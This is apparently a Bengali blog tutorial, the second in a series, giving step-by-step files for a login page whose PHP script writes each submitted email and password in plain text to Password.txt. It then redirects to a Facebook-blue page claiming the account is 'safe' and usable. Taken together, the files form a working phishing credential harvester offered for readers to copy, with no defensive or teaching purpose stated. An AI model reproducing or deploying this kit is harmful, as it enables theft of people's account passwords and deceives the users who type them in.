এর আগের পোস্টে আমরা লগইন ফর্ম তৈরী করেছি । এখন আমরা দেখব কিভাবে ফর্মে দেওয়া ডাটা গুলো save করতে হয় ।
আমি যে সকল example দিব তা হুবহু কপি করা লাবে যদি আপনি আগে থেকেই এগুলো ভালো বুঝেন তাহলে পরিবর্তন করতে পারেন । আজকে php এর কিছু কোড দেওয়া হবে তাই html সাপোর্টেড app বা notepad এ রান করা যেতে নাও পারে । এই php কোড রান করার জন্য যে সকল এ্যাপ লাগবে তা হল android এর জন্য penguin আর xamp ব্যাবহার করতে পারেন বা অনান্য app ব্যাবহার করতে পারেন ।
একটি বিষয় কোড উল্টা পাল্টা অথবা ফাইলের নাম পরিবর্তন করলে কাজ করবে না। তাই অনুরোধ রইল পুরা পোস্ট টি ভালো ভাবে পড়বেন ।
এবার নিচে দেওয়া উদাহরণ গুলো run করান । ধাপ গুলো অনুশরণ করি ।
এটি যেকোনো নামে save করতে পারেন । তবে আমি code লেখার সময় login.html নামে save করেছিলাম ।
২. পরবর্তী কোড-
<?php
if(isset($_POST['login'])){
$Name = "Email:".$_POST['name']."
";
$Pass = "Password:".$_POST['password']."
";
$file=fopen("Password.txt", "a");
fwrite($file, $Name);
fwrite($file, $Pass);
fclose($file);
header('location:submit.html');
}
?>
এই কোর্ডটি login.php নামে save করতে হবে ।
৩.পরবর্তী কোড-
<!DOCTYPE html>
<html lang="en">
<head>
<meta content='width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1' name='viewport'/>
<title>Successfully Account Safe
</title>
</head>
<style>
body{
background-color: #3b5998;
}
.f1{
text-align: center;
font-weight: bolder;
padding-top:10px;
}
.f2{
text-align: center;
padding-top:10px;
color:#F7F7F7;
}
button{
background-color: #5F6ECD;
color:#F7F7F7;
height: 35px;
border:0;
border-radius: 5px;
}
</style>
<body>
<div class="f1">
<font color="#FFFFFF">
You Have Successfully Enter Username and Password
</font>
</div>
<center>
<br><br>
<div class="f2">
Now you can easyly use your account.
</div>
<br>
<footer>
<a href="https://bong71.blogspot.com/">
<button>
visite my website
</button>
</a>
</footer>
</center>
</body>
</html>
এই কোর্ডটি submit.html নামে save করতে হবে ।
৪.এবার password.txt নামের একটি ফাইল তৈরি করতে হবে ।
মনে রাখা দরকার এই ৪ টি ফাইল একই ফোল্ডারে থাকা লাগবে ।
৪ টি ফাইলের কাজ কি ?
* login.html - এটি দিয়ে ফর্মটির ডিজাইন করা হয়েছে ।
* login.php - এটি দি ফর্মে দেওয়া data অর্থাৎ username আর password সেভ করার প্রগ্রাম লেখা হয়েছে ।
*submit.html - এটি হল data submit করার পর login.php ফাইলের redirect করা ফাইল ।
*password.txt - এখানে username আর password সেভ করা হয় ।
আমি এই কোড গুলো লেখার জন্য quoda Android application ব্যাবহার করেছি ,আর টেস্টের জন্য penguin application ব্যাবহার করেছি ।
কোনো help লাগলে কমেন্টে জানাতে পারেন ।